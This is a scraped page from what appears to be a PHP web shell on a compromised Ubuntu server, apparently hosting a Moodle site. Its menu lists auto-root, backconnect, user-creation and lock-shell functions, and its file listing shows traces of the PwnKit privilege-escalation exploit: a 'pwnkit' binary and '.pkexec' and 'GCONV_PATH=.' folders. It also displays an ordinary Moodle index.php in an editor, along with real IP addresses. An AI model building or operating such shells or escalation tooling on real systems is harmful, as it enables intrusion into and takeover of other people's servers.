Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
mod /
assignment /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
backup
[ DIR ]
drwxrwxrwx
db
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
pix
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
type
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
assignment.js
1.44
KB
-rwxrwxrwx
delete.php
1.48
KB
-rwxrwxrwx
grade.php
2.16
KB
-rwxrwxrwx
index.php
3.9
KB
-rwxrwxrwx
lib.php
163.22
KB
-rwxrwxrwx
locallib.php
6.91
KB
-rwxrwxrwx
mod_form.php
5.94
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
renderer.php
5.62
KB
-rwxrwxrwx
settings.php
1.16
KB
-rwxrwxrwx
styles.css
2.45
KB
-rwxrwxrwx
submissions.php
2.02
KB
-rwxrwxrwx
upload.php
1.49
KB
-rwxrwxrwx
version.php
1.19
KB
-rwxrwxrwx
view.php
1.7
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php require_once("../../config.php"); require_once("lib.php"); require_once($CFG->libdir.'/gradelib.php'); $id = required_param('id', PARAM_INT); // course if (!$course = $DB->get_record('course', array('id'=>$id))) { print_error('invalidcourseid'); } require_course_login($course); $PAGE->set_pagelayout('incourse'); add_to_log($course->id, "assignment", "view all", "index.php?id=$course->id", ""); $strassignments = get_string("modulenameplural", "assignment"); $strassignment = get_string("modulename", "assignment"); $strassignmenttype = get_string("assignmenttype", "assignment"); $strsectionname = get_string('sectionname', 'format_'.$course->format); $strname = get_string("name"); $strduedate = get_string("duedate", "assignment"); $strsubmitted = get_string("submitted", "assignment"); $strgrade = get_string("grade"); $PAGE->set_url('/mod/assignment/index.php', array('id'=>$course->id)); $PAGE->navbar->add($strassignments); $PAGE->set_title($strassignments); $PAGE->set_heading($course->fullname); echo $OUTPUT->header(); if (!$cms = get_coursemodules_in_course('assignment', $course->id, 'cm.idnumber, m.assignmenttype, m.timedue')) { notice(get_string('noassignments', 'assignment'), "../../course/view.php?id=$course->id"); die; } $usesections = course_format_uses_sections($course->format); $timenow = time(); $table = new html_table(); if ($usesections) { $table->head = array ($strsectionname, $strname, $strassignmenttype, $strduedate, $strsubmitted, $strgrade); } else { $table->head = array ($strname, $strassignmenttype, $strduedate, $strsubmitted, $strgrade); } $currentsection = ""; $types = assignment_types(); $modinfo = get_fast_modinfo($course); foreach ($modinfo->instances['assignment'] as $cm) { if (!$cm->uservisible) { continue; } $cm->timedue = $cms[$cm->id]->timedue; $cm->assignmenttype = $cms[$cm->id]->assignmenttype; $cm->idnumber = $cms[$cm->id]->idnumber; //Show dimmed if the mod is hidden $class = $cm->visible ? '' : 'class="dimmed"'; $link = "<a $class href=\"view.php?id=$cm->id\">".format_string($cm->name)."</a>"; $printsection = ""; if ($usesections) { if ($cm->sectionnum !== $currentsection) { if ($cm->sectionnum) { $printsection = get_section_name($course, $cm->sectionnum); } if ($currentsection !== "") { $table->data[] = 'hr'; } $currentsection = $cm->sectionnum; } } if (!file_exists($CFG->dirroot.'/mod/assignment/type/'.$cm->assignmenttype.'/assignment.class.php')) { continue; } require_once ($CFG->dirroot.'/mod/assignment/type/'.$cm->assignmenttype.'/assignment.class.php'); $assignmentclass = 'assignment_'.$cm->assignmenttype; $assignmentinstance = new $assignmentclass($cm->id, NULL, $cm, $course); $submitted = $assignmentinstance->submittedlink(true); $grading_info = grade_get_grades($course->id, 'mod', 'assignment', $cm->instance, $USER->id); if (isset($grading_info->items[0]) && !$grading_info->items[0]->grades[$USER->id]->hidden ) { $grade = $grading_info->items[0]->grades[$USER->id]->str_grade; } else { $grade = '-'; } $type = $types[$cm->assignmenttype]; // if type has an 'all.php' defined, make this a link $pathtoall = "{$CFG->dirroot}/mod/assignment/type/{$cm->assignmenttype}/all.php"; if (file_exists($pathtoall)) { $type = "<a href=\"{$CFG->wwwroot}/mod/assignment/type/{$cm->assignmenttype}/". "all.php?id={$course->id}\">$type</a>"; } $due = $cm->timedue ? userdate($cm->timedue) : '-'; if ($usesections) { $table->data[] = array ($printsection, $link, $type, $due, $submitted, $grade); } else { $table->data[] = array ($link, $type, $due, $submitted, $grade); } } echo "<br />"; echo html_writer::table($table); echo $OUTPUT->footer();
Close